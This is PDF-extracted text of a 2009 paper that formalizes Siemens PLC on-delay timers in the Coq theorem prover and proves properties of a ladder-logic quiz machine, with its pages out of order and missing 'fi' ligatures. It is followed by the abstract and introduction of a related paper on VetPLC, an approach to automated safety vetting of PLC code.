inner values of rduring the calculation phase is not of concern here. Intuitively, in Fig.4 the rst point represents the value of rat the beginning of the I/O phase of cycle 0, the second point represents the value of rat the beginning of the calculation phase of cycle 0, and so on. Thus, (r0)can have at least three different interpretations depending on whether the value is sampled at a,borc. Ifbis chosen, abstract trace Ais extracted from the concrete trace. In case of c, abstract trace Bis obtained. An abstract trace is a division of the concrete trace. Different abstract traces 319 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. io phase io phase io phase io phase calculation phase calculation phase calculation phase calculation phase abc (A) (B)0 1 2 3 0 1 2 3Figure 4. Different interpretations of value at a cycle separate the I/O phases and calculation phases differently. For trace B, an I/O phase and its following calculation phase belong to the same abstract cycle which is similar to the standard understanding of scan cycle. For trace A, a calculation phase and its following I/O phase belong to the same abstract cycle. Based on different abstract trace, different abstract models can be obtained. For example, two models can be built for the rst rung in Fig.2: % abstract model A Variables i0 i1 m1 : Var. Hypothesis h_m1 : forall c, m1 c = ((i0 (pred c)\/m1 (pred c))/\ i1 (pred c)). % abstract model B Variables i0 i1 m1 : Var. Hypothesis h_m1 : forall c, m1 c = ((i0 c \/ m1 (pred c)) /\ i1 c). In the rst model, since the calculation of m1 s value at cycle cis based on the values of i0andi1at the previous cycle, i0(pred c )andi1(pred c )are used. In the second model, the calculation of m1uses the values of i0andi1at the current cycle, so i0candi1care used. The discussion about the interpretations of time is similar to that of relay values. This will be discussed in detail in section IV-E. D. Rungs and Their Execution Order Every rung is modeled by a hypothesis in Coq. The execution order of instructions in a PLC program should be re ected by the model. According to the cyclic behavior of PLC and the execution order of instructions, for each node i, itsrefican be divided into two disjoint subsets: refc iandrefp i, where refc istands for the set of variables whose values at the current scan cycle are used for the execution of iandrefp istands for the set of variables whose values of the previous scan cycle are used for the execution of i. Let us take the sixth rung in Fig.2 for example, refc 6=fm1; m2; m3; m4gandrefp 6=fm5g. For any cycle c,vc2refc 6andvp2refp 6,(vcc)and (vp(pred c ))are used to calculate m5. Hence, we have the following Coq codes for the sixth rung: Hypothesis h_m5 : forall c, m5 c = (((m2 c\/m3 c\/m4 c)\/m5 (pred c))/\m1 c).E. TON-Timer As mentioned in section IV-C, based on different abstrac- tions we have different models for TON-timers. We rst give the assumption about the preset time of t1, then choose an interpretation location, nally build a model for t1. 1) Assumptions about Time: Based on the above nota- tions, de nitions of timer bit and preset time of the TON- timer are given as follows ( t1is used to denote the timer bit andt1PTof type Time denotes the preset time): Variable t1:Var. Variable t1_PT:Time. In practice, the preset time of t1must be greater than time span of any adjacent scan cycles: Hypothesis f_TLTCI : forall c, f (S c) - f c < t1_PT. 2) The Interpretation Location: The concrete trace of quiz machine is shown in Fig.5. We concern the inner values in the calculation phase here. We have several different interpretation locations. Here we choose location a. The abstract trace is the line below. The model of TON-timer t1is represented by three axioms: Axiom h_t1_reset : forall c, m1 c -> t1 c. Axiom h_t1_set : forall c1 c2, t1_PT<=f(pred c2)-f(pred c1)-> being_true m1 c1 c2 -> t1 c2. Axiom h_t1_true : forall c2, t1 c2->exists c1, t1_PT<=f(pred c2) - f (pred c1) /\ being_true m1 c1 c2. Axiom ht1reset re ects the second characteristic of TON-timer. The references to the same cycle cin m1c and t1c show the fact that the value of m1affects the value of t1in the same cycle. The meaning of the sec- ond axiom can be explained using Fig.5. Suppose in the abstract trace the time span from (pred c 1)to(pred c 2) is greater than or equal to t1PT (which is presented by t1PT < =f(pred c 2) f(pred c 1) ) and m1is ON between c1andc2(which is expressed by the predicate being true m 1c1c2 ). Hence in the concrete trace the time span between aandeis greater than or equal to t1PT. Because of the fth constraint mentioned in section IV-B, the time span between aandbis equal to the time span between eandf. Finally we have that the time span between bandfis greater than or equal to t1PT. Note that rung 2 contains the timer instruction. Together with the fact that m1stays ON from btog, we have that t1is ON at gin the concrete trace, in other words t1is ON at cycle c2in the abstract trace, which is the conclusion of the second axiom. The third axiom can be understood in a similar manner. These axioms forms a parameterized module for a TON- timer. The module has two parameters: IN(which is m1in the example) and PT(which is t1PTin the example). 320 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. io phase preparation rung 1 rung 2 io phase preparation rung 1 rung 2 io phase preparation rung 1 rung 2 ... ... ... aio phase preparation rung 1 rung 2 ... c b d e f ghi pred c1 pred c2 c1 c2 Figure 5. Concrete and abstract traces In general, the statement of these hypothesis have to be universally quanti ed over arbitrary inputs and outputs. For the convenience of this study, we assume that the hypothesis have been instantiated by the concrete variables in the program. V. T HECOMPLETE MODEL OF QUIZMACHINE The complete model of the quiz program is shown below: Variables i0 i1 i2 i3 i4 : Var. Variables m1 m2 m3 m4 m5: Var. Variables o0 o1 o2 o3 : Var. Variable t1 : Var. Variables t1_PT : Time. Hypothesis f_TLTCI : forall c, f (S c) - f c < t1_PT. Axiom h_t1_reset : forall c, m1 c -> t1 c. Axiom h_t1_set : forall c1 c2, t1_PT<=f(pred c2)-f(pred c1)-> being_true m1 c1 c2 -> t1 c2. Axiom h_t1_true : forall c2, t1 c2->exists c1, t1_PT<=f(pred c2) - f (pred c1) /\ being_true m1 c1 c2. Hypothesis h_m1 : forall c, m1 c = ((i0 c \/ m1 (pred c)) /\ i1 c). Hypothesis h_m2 : forall c, m2 c = ((( t1 c /\ i2 c /\ m5 (pred c)) \/ m2 (pred c)) /\ m1 c). Hypothesis h_m3 : forall c, m3 c = ((( t1 c /\ i3 c /\ m5 (pred c)) \/ m3 (pred c)) /\ m1 c). Hypothesis h_m4 : forall c, m4 c = ((( t1 c /\ i4 c /\ m5 (pred c)) \/ m4 (pred c)) /\ m1 c). Hypothesis h_m5 : forall c, m5 c = (((m2 c \/ m3 c \/ m4 c) \/ m5 (pred c)) /\ m1 c). Hypothesis h_o1 : forall c, o1 c = m2 c. Hypothesis h_o2 : forall c, o2 c = m3 c. Hypothesis h_o3 : forall c, o3 c = m4 c. Hypothesis h_o0 : forall c, o0 c=(t1 c/\ m5 c). The above model can be understood as a module with one parameter t1PT and a property fTLTCI that the parameter should satisfy. By giving t1PT a constant that satis es fTLTCI to the module, an instance can be obtained such that all properties the parameterized module hold are also held by the instance.A. Formalization of Properties We proved that three expected behaviors, each of which is described in a theorem, hold in Coq. The rst of these properties is delineated in the following theorem. It describes the situation that one player presses his button and then the associated light is turned on. The theorem contains various conditions to make sure that the action can proceed. In order to make the theorem clear, several predicates, such asreset then start andjust time out, are introduced. They will be explained along the description of the theorem. Theorem reset_start_time_i2_o0o1o2o3_f : forall c1 c2, reset_then_start c1 c2 -> forall c3, just_time_out c2 c3 -> forall c, S c2 <= c <= c3 -> p1_first_presses (S c2) c -> forall c4, c <= c4 -> not_reset (S c2) c4 -> stay_off o0 (S c2) c4 /\ off_on o1 (S c2) c c4 /\ stay_off o2 (S c2) c4 /\ stay_off o3 (S c2) c4. The formulae before the last arrow present the premises, i.e. the behaviors of the environment (including the actions of the host and players); those after the last arrow describe the conclusions, i.e. the expected behavior of the system. Fig.6 is a graphic representation of the theorem, where the words above the horizontal arrow describe the premises and the words below the arrow describe the conclusions. Predicate reset then start c 1c2 expresses the action sequence of the host: the host presses reset button at cycle c1 and does not press start button from cycle c1to cycle c2, then he presses start button at cycle (S c2)(i.e. the next cycle of c2). Predicate just time out c 2c3 means the time span between c2andc3is less than t1PT and that between c2and(S c3)is equal or larger than t1PT. Predicate p1first presses (S c2)c describes the fact that there exists a cycle csuch that between (S c2)and(pred c )no one presses his button and at cplayer 1is the only one that presses his button. Predicate notreset (S c2)c4 means during (S c2)andc4the reset button is not pressed. The conclusion has four predicates: 1) offon o 1(S c 2)c c4 means that light 1is off between S c2andpred c and light 1is on between cand c4; 2) stay off o 0(S c2)c4 , stay off o 2(S c2)c4 and stay off o 2(S c2)c4 describe that between S c2andc4light 0, light 1and light 3 321 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. c1 c2 S c2 pred c c c3 S c3 c4 reset ~start start < t1_value >= t1_value ~p1,~p2,~p3 p1 ~p2 ~p3 ~reset ~o1 o1 ~o0, ~o2, ~o3 Figure 6. Graphic representation of theorem 1 are all off. B. Outline of the Proof Since the proofs of the three theorems are lengthy the whole le has more than two thousand lines we only outline the proof skeleton here. The model of the quiz machine can be considered as a transition system. The state of the system is an vector consisting of all the internal relays : ( m1; m2; m3; m4; m5). The inputs of the program (i.e. i0; i1; i2; i3andi4) and the timeout signal (i.e. t1) are the guards on the transitions. Part of transition system used to prove the theorem is demonstrated in Fig.7. The numbers in the states above the line indicate the values of m1; m2; m3andm5respectively and those below the line indicate the values of o0; o1; o2ando3. The variables above the transitions represent the conditions under which the corresponding transition can take place. Variables not mentioned means the transition does not care the values of these variables. For instance, if the system is at state s1, then all the output and internal relays are 0. Ifi0is false, whatever values the other variables are the system stays in s1. Ifi0is true, the system will change to state s2. The promises of the theorem express the inputs of the system and their orders: 1)The host presses the reset button. 2)The host presses the start button and does not press the reset button afterwards. 3)Player 1 rstly presses his button before the timeout. We proved that following the above inputs the system 1)reaches s1after the host presses the reset button; then 2)it reaches s2after the host presses the start button; then 3)it reaches s3after player 1presses his button before timeout. And the outputs of this process coincide with the conclusion of the theorem. The other two theorems are proved in the same manner. 0 0 0 0 0 ----- 0 0 0 0 i0 /\ ~i1 1 0 0 0 0 ----- 0 0 0 0 ~i1/\(~(i2/\~i3/\~i4/\~t1)) ~i0 1 1 0 0 1 ----- 0 1 0 0 ~i1/\i2/\~i3/\~i4/\~t1 ~i1 i1 s1 s2 s3 Figure 7. Part of the transition system VI. C ONCLUSIONS We presented a formalization of the TON timer of pro- grammable logic controllers (PLCs) in the theorem prover Coq. In order to ease the modeling and veri cation process a sound abstract model is proposed. Based on different interpretations, different abstract models can be obtained. The behavior of the TON-timer is described by a set of axioms at an abstract level, which proves to be appropriate for the formal reasoning in this paper. A quiz machine pro- gram with TON-timer is employed as an illustration example throughout the paper. We proved that the PLC quiz machine program works as expected. This work demonstrates the complexity of formal timer modeling. REFERENCES [1]Mader, A., Wupper, H.: Timed automaton models for simple programmable logic controllers. In: Proceedings of the Eu- romicro Conference on Real-Time Systems, IEEE Computer Society (1999) 114 122 [2]Coq Proof Assistant: http://www.lix.polytechnique.fr/coq/ [3]L Her, D., Parc, P.L., Marc e, L.: Proving sequential function chart programs using automata. In: WIA 98: Revised Papers from the Third International Workshop on Automata Implementation, London, UK, Springer-Verlag (1999) 149 163 [4]Dierks, H.: PLC-automata: a new class of implementable real- time automata. Theoretical Computer Science 253(1) (2001) 61 93 [5]Bauer, N.: ubersetzung von steuerungsprogrammen in formale modelle. Master s thesis, University of Dortmund (1998) [6]Moon, I.: Modelling programmable logic controllers for logic veri cation. IEEE Control Systems Magazine 14(2) (1994) 53 59 [7]Kr amer, B.J., V olker, N.: A highly dependable computing architecture for safety-critical control applications. Real-Time Systems 13(3) (1997) 237 251 [8]Jim enez-Fraustro, F., Rutten, E.: A synchronous model of iec 61131 PLC languages in signal. In: ECRTS 01: Proceedings of the 13th Euromicro Conference on Real-Time Systems, Washington, DC, USA, IEEE Computer Society (2001) 135 [9]IEC International Standard 1131-3: Programmable Con- trollers, Part 3: Programming Languages. 322 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. (1993) [10] Siemens: S7-200 Programmable Controller System Manual. Siemens (2003) [11] Mader, A.: A classi cation of PLC models and applications. In: In WODES 2000: 5th Workshop on Discrete Event Systems, Kluwer Academic Publishers (2000) 21 23 323 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply.
Formalization and Veri cation of PLC Timers in Coq Hai Wan Key Lab for ISS of MOE, Tsinghua National Laboratory for Information Science and Technology, School of Software, Tsinghua University, Beijing, China Email: wanh03 @mails.tsinghua.edu.cnGang Chen Lingcore Laboratory Portland, USA Email: gangchensh @gmail.comXiaoyu Song ECE Dept, Portland State University Portland, USA Email: songpisa @yahoo.comMing Gu Key Lab for ISS of MOE, Tsinghua National Laboratory for Information Science and Technology, School of Software, Tsinghua University Beijing, China Email: [email protected] Keywords -PLC; TON-Timer; Modeling; Coq I. I NTRODUCTION Programmable logic controllers (PLCs) are widely used for safety critical applications in various industrial elds. The correctness and reliability of PLC programs are of great importance. The use of timers is one of the distinguished features of PLCs programs, since the notion of time is mainly introduced by timers in PLC systems. Hence, the main focus of this paper is the modeling and veri cation of PLC programs with timers. Based on the operational semantics, in [1] PLC programs are translated into timed automata. They proposed two ways to model timers: one is to treat timers as symbolic function block calls and the other is to model timers as separate timed automata. Model checker UPPAAL is employed to verify the model. In [3], timed automata are used to model Sequential Function Chart programs. In their work, the use of timers is restricted each step is associated with a timer and the timer is taken for guarding the transitions in other words, timers are not used in a restricted form. A special automaton that orients real-time systems PLC-automaton is developed to model the speci cations of real-time ap- plications. Structured Text programs can be automatically This work was supported in part by the Chinese National 973 Plan under grant No. 2004CB719400, the NSF of China under grants No. 60553002, 60635020 and 90718039.generated from PLC-automata [4]. They did not model PLC programs with timers, but use timers to implement PLC- automata. In [5] condition/event systems are adopted to model PLC programs. There is an assumption that timers can be started only at the beginning of the calculation phase. In [6], the Ladder Diagram programs are investigated and time is treated implicitly. Model checker SMV was used to verify the model. The methods mentioned above are all related to the model checking technologies. Besides model checking, theorem proving is alsoem- ployed in veri cation of PLC Programs. In [7] the theorem system Isabelle/HOL was used to model and verify PLC pro- grams. Modular veri cation method is adopted in the paper. They had a simple model of time, because they assumed that the current value increases monotonously and there is no reset action during this process. No explicit model of a timer was given. In [8], the synchronous language SIGNAL is used to model Structured Text and Function Block Diagram programs. They did not treat timer instructions. This paper is an attempt of formally proving the cor- rectness of PLC programs with timer control. The Coq [2] theorem prover is chosen as our formal veri cation tool. It allows problem speci cation, program formalization and property proving in a single working environment. A timed quiz machine problem is employed as the case study example. Informally, the main properties under investigation are statements of the forms that, if a proper sequence of stimuli are received by the PLC program, then some expected outcomes will be observed. The problem becomes involved as the timer input depends on its output in previous cycle. By the nature of the TON timer, its input signals have to be kept stable during the timing period. That is, their values have to be constant between the start of timing process and the timeout point. However, the cyclic program structure does not make this property obvious. To make the proving process manageable without loss of generality, we will introduce three abstract axioms at an appropriate level to characterize 2009 33rd Annual IEEE International Computer Software and Applications Conference 0730-3157/09 $25.00 2009 IEEE DOI 10.1109/COMPSAC.2009.49315 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. the behavior of TON timer (see section IV for details). As the rst step in this formalization, we assume the existence of a function fwhich maps the start of each scan cycle to its time point. This function is abstract and it needs only to satisfy a monotonic requirement. Such an assumption allows us to establish the relation between scan cycles (see next section for the descriptions of PLC and the notion of scan cycle) and real time points without explicitly calculating the exact time period of each cycle. It should be noted that the adoption of this function relies on the programming practice that the timer output is sampled only once in the program. A subtle issue in this formal model is the selection of the starting and ending points of each scan cycle. In the PLC convention, a scan cycle starts with the input phase, followed by the execution phase and the output phase. As a result, the de nition of the function f encounters many choices. It can map the start of the input phase to time, or map the start of the execution phase or the start of the output phase to time. Such a selection would give different interpretations to timer axioms and will in uence the forms of system properties. A further discussion on this issue can be found in section IV-B and IV-E. With the preparation given above, we can give an informal description on the axiomatic assumptions of TON timer: if the main input to the timer turns off, so does the timeout signal; if the preset timeout period is passed and that the main timer input has been kept ON during this period, then the timeout signal will turn on (or keep on) at next cycle; if the timeout signal will be turned on at next cycle, then the main input signal must have been kept on for a period larger than the preset timing period. The precise description of these hypothesis is presented in section IV-E2. These assumptions characterize the global behavior of TON timer. They appear both reasonable and suf cient for the veri cation of most timer-related problems. From this study, it made clear that formal PLC veri cation can bene t from Coq in many aspects. First, Coq gives us enough expressive power to model PLC programs with timers at any desired abstract level. A formal timer model, expressed in a set of Coq axioms or hypothesis, can abstract away the differences among timers with different resolutions. The abstraction facilitates the modeling and veri cation process. Second, Coq allows us to prove parameterized properties, which is a useful feature not directly supported by model checking. Third, it is easy to model objects by parameterized Coq modules so that speci cations and proofs can be reused and scalable. The rest of the paper is organized as follows. In the following section, we give a short introduction to PLC and its timers. A quiz machine example is described in Section III. The example is employed throughout the paper. In Section IV, we describe the method of modeling timersin the theorem prover Coq in detail. Section V shows the complete model of the example program and outlines the proof. Finally, Section VI concludes the paper. II. P ROGRAMMABLE LOGIC CONTROLLER AND TIMERS A PLC system typically consists of a CPU, a memory and input/output points through which the system communicates with its outside environment. The execution of a PLC program is an in nite loop in which each iteration is called scan cycle. Typically, each scan cycle can be divided into three phases: 1)Input phase during which PLC system reads the values of sensors and copies them into memory which forms a snapshot of the environment. These values do not change throughout the rest of the cycle. Input phase takes the same time in each scan cycle. 2)Calculation phase during which the PLC system executes the instructions and writes back the results into memory. At the beginning of each calculation phase, PLC system does some preparations, such as self-check and timer instructions (for the timers whose base is 10ms). The preparations take the same time. 3)Output phase during which PLC maps the results into actuators. Output phase takes the same time in each scan cycle. There are ve standard programming languages for PLC [9] among which the Ladder Diagram (LD) is the most widely used programming language. From now on, we concentrate on the LD language. As an embedded system, the real-time aspect of PLC system is ensured by the use of timers.1There are mainly three kinds of timers in S7-200[10]: TON-timer, TONR- timer, and TOF-timer. In this paper, we focus on the TON- timers. The other two kinds of timers can be treated in a similar manner. A TON-timer has two input ports: IN that indicates whether the timer is enabled and PT that is the preset value of the timer. There are two output ports: one for the current value and the other for the timer bit. The characteristics of a TON-timer are informally described as follows: 1)A TON-timer counts time (i.e. increase its current value) when its IN is ON and it is updated. 2)A TON-timer s timer bit is OFF and its current value is set to zero when its IN is OFF. 3)If a TON-timer s current value is greater than or equal to its PT, its timer bit is ON. 4)A TON-timer continues counting after its PT is reached, and stops counting when the maximum value 32767 is reached. 1Since there are many different kinds of PLCs in the industry and the instructions used in these PLCs are different from each other, in order to ease the discussion, from now on, we focus on S7-200 which is a kind of PLC produced by the Siemens company. In some cases, time is ensured by the use of interruptions. We do not consider this case here. 316 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. T33 I2.0 IN PT 3TON I2.0 T33(current) T33(bit)PT=3 PT=3 Maximum Value=32767 Figure 1. TON timer and its behivour According to the user manual of S7-200, a TON-timer and its behavior are demonstrated in Fig.1. A TON-timer has three resolutions: 1ms, 10ms, and 100ms. The behaviors of timers with different resolutions are different. For the timer with time base of 1ms, it updates every 1ms asynchronously to the scan cycle. In other words, the timer bit can be updated multiple times during one scan cycle. For the 10ms timer, it only updates at the beginning of each scan cycle. For the 100ms timer, its current value is updated only when the instruction is executed. The user manual emphasizes that, for the 100ms timer, its instruction should be executed one and only one time during each cycle. In section IV-E, we propose a set of axioms to model the behavior of a TON-timer. This axiom set appears suf cient for proving many properties of practical interests. III. A NILLUSTRATIVE EXAMPLE In this section, we show a quiz machine problem as an illustrative example to explain some basic notions of LD language, control ow graph of program, and the modeling process of TON-timers. A quiz machine is an equipment used in a contest which involves a host and several players. The host uses his buttons to start and reset a contest. Every player controls his button which is associated with a light. The button is used for the player to vie to answer and the light is used to indicate that the corresponding player has the chance to answer. After the host starts a contest, the rst player who presses his button within the prede ned time will turn on an associated light. If more than one players press the buttons at the same time, the machine should inform the host to restart another contest. If during the prede ned time there is no one pressing the button, the machine should inform the host that time is out and keep all players lights off even if some of them press their buttons. The ladder diagram implementation of quiz machine with three players and a prede ned time of 3 seconds are shown in Fig.2. As shown in Fig.2, a LD program consists of a set of rungs. There are 10 rungs in the example program. Each rung can be seen as a connection between logical checkers(contacts or relays) and actuators (coils). There are two kinds of relays: normally open contact (- j j-) and normally closed contact (- j=j-). Each relay or coil is associated with a bit which can be 0 or 1. For example, the rst rung contains three relays (which are associated with bits m1, i1andi0respectively) and one coil (associated with bit m1). Normally, each rung has only one coil. If a path can be traced between the left side of the rung and the coil, through ON relays, the rung is true and the bit of output coil is 1. A normally open relay is ON iff its bit is 1. A normally closed relay is ON iff its bit is 0. Intuitively, each rung can be understood as a assignment consists of the bits in the rung. For example, the rst rung can be expressed by m1= (i0^m1)_ :i1. In the program, the start and reset buttons are associated withi0andi1respectively (i.e. if start button is pressed then i0is 1). The buttons for players are i2,i3andi4.o1,o2, ando3are used to control the corresponding lights l1,l2, andl3, respectively. o0denotes whether the time is out. The system s inner states consist of ve bits: from m1tom5.m1 indicates whether the contest begins. TON-timer t1counts when m1is 1 and is used to record the escaped time after the host presses start button. The timer bit of t1is 1 when the escaped time extends the prede ned timeout. m2,m3and m4denote whether play 1, play 2or play 3 rst presses his button respectively. m5represents whether there is a player that presses his button within the prede ned timeout. Three time related program properties should be satis ed. The host presses the reset button and, after a while, he presses the start button. Between the time he presses the start button and the timeout: if there is only one who rst press his button, the corresponding light will turn on and the other lights stay off; if at least two players rst press their buttons at the same, their lights will be turned on and the other lights stay off; if no one presses the button, the light indicating timeout will turn on and the other lights stay off. IV. M ODELING PLC P ROGRAMS WITH TIMERS Following the criteria proposed in [11], we show our method of modeling PLC programs with timers in three steps: 1)programming language fragments that are used and assumptions and constraints of the PLC programs; we also propose a preprocess that makes PLC programs satisfy the constraints. 2)how to model the cyclic operation mode; 3)how to model the timer. We rst introduce the control ow graph and its associated table which give us a formal base for the description and veri cation of constraints. 317 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. i0 m1 m1 IN TON t1 +3000 PT m1 t1 i2 m2 100ms TON m5 m2 m2 m3 m4 m5 ( ) m5 ( ) m2 o1 ( ) m3 o2 ( ) m4 o3 ( ) t1 o0 m5 i1 ( ) ( ) m1 t1 i3 m3 m5 m3 ( ) m1 t1 i4 m4 m5 m4 ( ) m1 m1 Figure 2. The Ladder Diagram of Quiz Mechine A. Control Flow Graph of PLC Programs The structure of a PLC program can be described by a control ow graph (CFG). As an example, the CFG of the quiz program is shown in Fig.3. There is a special node N0 that represents the preparation phase at the beginning of the calculation phase. Every program s CFG has such a node, since every scan cycle contains a preparation phase. Each of the rest nodes denotes a rung in the program. Since there is no loop and case constructs in the program, the CFG is a simple cycle (note the cyclic behavior of PLC systems). Every node iis associated with three sets: refi,defi, and times i, where refiis the set of variables node irefers to, defiis the set of variables node ide nes and times iis the set of all possible time spans used to reach node ifrom the beginning of the calculation phase. Intuitively, refiis the set of variables used in the right hand side of the assignment related to rung i, while defiis that appear in the left hand side of the assignment. Since each rung has only one coin, the cardinality of defiis always one. Tab.I shows the sets for each node. The superscript iof each variable in the refi means the variable is de ned at node i. For instance, m1 1 inref2means m1used at node 2is de ned at node 1. We assume the executions of each rung cost the same time which is 3ms.2CFG and the table form a formal representation of a PLC program s structure. The timer bits are special variables in PLC. Comparing to other variables, their values can change multiple times without explicit assignments. If 1ms TON-timer is chosen for the program in Fig.2, we need to add t1to every defi since it can update asynchronously to the scan cycle and make some modi cations to t 1in each refi. The result table 2The execution times for different rungs can be different, but this doesn t effect the modeling and veri cation process. Figure 3. The CFG of the quiz machine program Table I ref S AND def S FOR THE CFG OF QUIZ MACHINE Node No. ref def times 0 fg fg f0msg 1 fi0; i1; m1 1g fm1gf3msg 2 fm1 1g ft1gf6msg 3 ft2 1; i2; m6 5; m1 1; m3 2gfm2gf9msg 4 ft2 1; i3; m6 5; m1 1; m4 3gfm3gf12msg 5 ft2 1; i4; m6 5; m1 1; m5 4gfm4gf15msg 6 fm1 1; m3 2; m4 3; m5 4; m6 5gfm5gf18msg 7 fm3 2g fo1gf21msg 8 fm4 3g fo2gf24msg 9 fm5 4g fo3gf27msg 10 ft2 1; m6 5g fo0gf30msg is shown in Tab.II. B. Assumptions and Constraints We articulate the assumptions and constraints below and explain how to modify the program that does not meet these properties to make them satisfy these properties: 1)The executions of the same instruction take the same time. 2)There is no loop in one scan cycle, i.e. if we remove N0, the resulted CFG is an acyclic graph. 3)During one scan cycle, the values of a TON-timer used by several instructions are the same. This can be stated formally as 8n1n2n3n4:Nodes; t :Timers :tn32 refn1_tn42refn2!n3=n4. If the program does not satisfy the constraint, this could cause unfair treatment to players in the quiz competition. Given a program does not satisfy the constraint, the following modi cations should be made to the program: 1ms TON-timer. For each 1ms TON-timer t, a new variable mis introduced and a new rung Table II ref S AND def S FOR THE CFG OF QUIZ MACHINE WITH 1MS TON- TIMER Node No. ref def times 0 fg ft1g f0msg 1 fi0; i1; m1 1g fm1; t1gf3msg 2 fm1 1g ft1g f6msg 3 ft2 1; i2; m6 5; m1 1; m3 2gfm2; t1gf9msg 4 ft3 1; i3; m6 5; m1 1; m4 3gfm3; t1gf12msg 5 ft4 1; i4; m6 5; m1 1; m5 4gfm4; t1gf15msg 6 fm1 1; m3 2; m4 3; m5 4; m6 5gfm5; t1gf18msg 7 fm3 2g fo1; t1gf21msg 8 fm4 3g fo2; t1gf24msg 9 fm5 4g fo3; t1gf27msg 10 ft9 1; m6 5g fo0; t1gf30msg 318 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:44:38 UTC from IEEE Xplore. Restrictions apply. Table III ref S AND def S FOR THE CFG OF MODIFIED QUIZ MACHINE WITH 1MS TON- TIMER Node No. ref def times 0 fg ft1g f0msg 1 fi0; i1; m1 1g fm1; t1gf3msg 2 fm1 1g ft1g f6msg 3 ft2 1g fm6g f9msg 4 fm3 6; i2; m6 5; m1 1; m3 2gfm2; t1gf12msg 5 fm3 6; i3; m6 5; m1 1; m4 3gfm3; t1gf15msg 6 fm3 6; i4; m6 5; m1 1; m5 4gfm4; t1gf18msg 7 fm1 1; m3 2; m4 3; m5 4; m6 5gfm5; t1gf21msg 8 fm3 2g fo1; t1gf24msg 9 fm4 3g fo2; t1gf27msg 10 fm5 4g fo3; t1gf30msg 11 fm3 6; m6 5g fo0; t1gf33msg j j tj (m) is inserted before the rst reference to t. All the references to tare replaced by the references of m. For example, if 1ms TON- timer is used in the program shown in Fig.2, the program does not satisfy this constraint for the values used at node 3 and 4 are different i.e. in Tab.II the superscripts of t1at nodes 3 and 4 are different. The table of the program after modi cation is shown in Tab.III from which it can be veri ed that the program holds the constraint. 10ms and 100ms TON-timers. No modi cation is needed. 4)For each node iin CFG that de nes a timer, i.e. the timer is in defi, and referred by other nodes in the same cycle, the cardinality of times iis 1. In other words, for such node there is one and only one path to reach it. This constraint ensures that the time intervals used to reach the same timer instruction from the beginning of the scan cycle are the same. 5)Each relay can be set value at most once per scan cycle. Modi cations described in [8] can be made to programs that do not satisfy this constraint. All the constraints can be veri ed based on the CFG and its associated table. It can be veri ed that the program corresponding to Tab.I and Tab.III satisfy all the above constraints. We will discuss the reason why we have these assumptions and constraints in the following sections. C. Cyclic Behavior, Relays and Time According to [11], there are four ways to model scan cycle: models without scan cycle, models with explicit scan cycle, models with implicit scan cycle, and models
Towards_Automated_Safety_Vetting_of_PLC_Code_in_Real-World_Plants.pdf
Safety violations in programmable logic controllers (PLCs), caused either by faults or attacks, have recently garnered signi cant attention. However, prior efforts at PLC code vetting suffer from many drawbacks. Static analyses and veri cation cause signi cant false positives and cannot reveal speci c runtime contexts. Dynamic analyses and symbolic execution, on the otherhand, fail due to their inability to handle real-world PLC pro-grams that are event-driven and timing sensitive. In this paper, we propose V ETPLC, a temporal context-aware, program analysis- based approach to produce timed event sequences that can be used for automatic safety vetting . To this end, we (a)perform static program analysis to create timed event causality graphs in order to understand causal relations among events in PLC code and (b) mine temporal invariants from data traces collected in IndustrialControl System (ICS) testbeds to quantitatively gauge temporaldependencies that are constrained by machine operations. Our V ETPLC prototype has been implemented in 15K lines of code. We evaluate it on 10real-world scenarios from two different ICS settings. Our experiments show that V ETPLC outperforms state-of-the-art techniques and can generate event sequences that can be used to automatically detect hidden safety violations . I. I NTRODUCTION Industrial control systems (ICS) play an essential role in modern society. In the new era of Industry 4.0 [12], comput- erized control systems have become the backbone of crucial infrastructures such as power grids, transportation as well as manufacturing sectors. Compared to traditional ICS that were constructed using xed electronic circuits, programmable logic controllers (PLC) have brought exibility, con gurability andautomation to these domains. However, this freedom has also introduced complexity, and thus uncertainty, to safety-critical physical plants. Unexpected logic errors may cause serious problems such as fatal collisions or massive explosions. Re-ports have shown that anomalous ICS behaviors have resultedin loss of life on real-world factory oors [11], [19]. In addition, security problems are highly coupled with safety issues in the ICS domain. In fact, physical damage is one of the major goals for security breaches in ICS. Compared to attacks targeting consumers or IT systems, that often aim to make pro ts or steal data, cyberattacks on factory oors are intended to sabotage physical infrastructures. Real-worldincidents, including Stuxnet [36], German Steel Mill Cyber At- tack [49], Ukrainian Power Grid Attack [50], have shown that although adversaries must rst leverage security penetrationtechniques to in ltrate the digital layers of modern plants, they often attempt to manipulate critical safety parameters, such as the frequency of nuclear centrifuges, and trigger benign butfaulty code, to cause serious damage. Hence, there is a needfor detecting situations where such safety violations can occur. Due to the complexity of contemporary ICS, that involvesinteractions between PLCs and various other machines, we need automated mechanisms to nd such problems. While there exists work [24], [28], [30], [31], [42], [44], [57], [58], [61], [63], [65] that aims to statically verify PLC logic in a formal manner, such static analysis techniquessuffer from signi cant false positives since they are unable to reason about runtime execution contexts. For instance, they may detect potential problematic paths in the code that are infeasible at runtime. In addition, the behavior of ICS is strictly constrained by physical limits at runtime (e.g., velocity, temperature, etc.) as well as changes to these properties. To address these limitations, prior work [35], [39], [45], [62] has explored the usage of dynamic simulations of runtimebehaviors to detect PLC safety violations. In addition, recentwork [43], [54] has enabled symbolic execution on PLCcode. Despite their apparent effectiveness in nding bugs in independent PLC programs, these techniques are limitedbecause they overlook an important fact that a real-worldPLC is never working alone. On the contrary, it collaborateswith other programmable components on the factory oor, such as robots, CNCs or even other PLCs, to carry out certain tasks. 